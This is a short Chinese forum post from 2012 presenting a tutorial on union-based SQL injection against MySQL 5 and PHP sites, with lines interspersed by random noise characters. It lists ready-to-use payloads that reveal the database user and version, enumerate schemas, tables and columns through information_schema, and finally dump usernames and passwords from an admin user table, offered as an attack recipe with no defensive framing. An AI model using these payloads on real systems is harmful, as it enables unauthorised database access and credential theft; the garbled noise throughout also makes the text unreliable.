9 J8 h! r" J7 T N* ~4 i0 J教程内容:Mysql 5+php 注入
* [6 R: H2 ?9 E% A3 }2 {' [0 l) f# P
9 \+ R, [2 c% O4 ?8 r- @; o. ?8 S f5 q$ Q
一.查看MYSQL基本信息(库名,版本,用户)
b; J+ m& g+ R. o g
1 C6 K0 M* Y/ @1 z- Wand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*1 P5 B7 Q: Q6 Q' j: r
5 z R% k, N$ m, D; I. p U: {二.查数据库
6 ~3 Z! c6 [1 G: L6 F8 w* p( A3 Q. m' w+ _3 n. P
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
% G! G; n, m6 P+ I h6 Blimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
" N% d0 M7 A- T' v
4 \: a" H! }3 @( j# a三.暴表
7 g5 s( K. m- y8 ~: g2 d& e
% u! U/ E @) V+ d, D& \and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
0 o6 t B6 L$ `) }' } a' I1 h1 {0 F* }+ X- V, L
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。6 h8 b2 G; u4 \6 ]8 y5 S3 j- L
$ P& {$ a7 b( b3 o: |7 f) i4 O四.暴字段
! e7 {4 |9 [. |6 I2 _$ Y! D: o
: H; [& T! p, N- T L' v% dand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*! W7 ?( v9 X( h4 i. U: C+ f
8 ~4 `* n. F1 t6 x0 t& B5 Rlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
[+ G- l3 \/ O. h- b. D5 }6 s0 x; ^; F, y4 O
五.暴数据
1 ^5 f i' x! I9 A/ y5 C( w- w* I2 u3 s# t3 L
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
% z% V8 Y" Q$ N3 J! J* l
0 |+ e# M5 l2 Q% ^- v" a0 m, i8 N& l$ n3 }) T2 ^& H7 F9 J- Z
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
: W `0 F+ X! x% b |
发表于 2012-9-13 16:27:53
收藏
支持
反对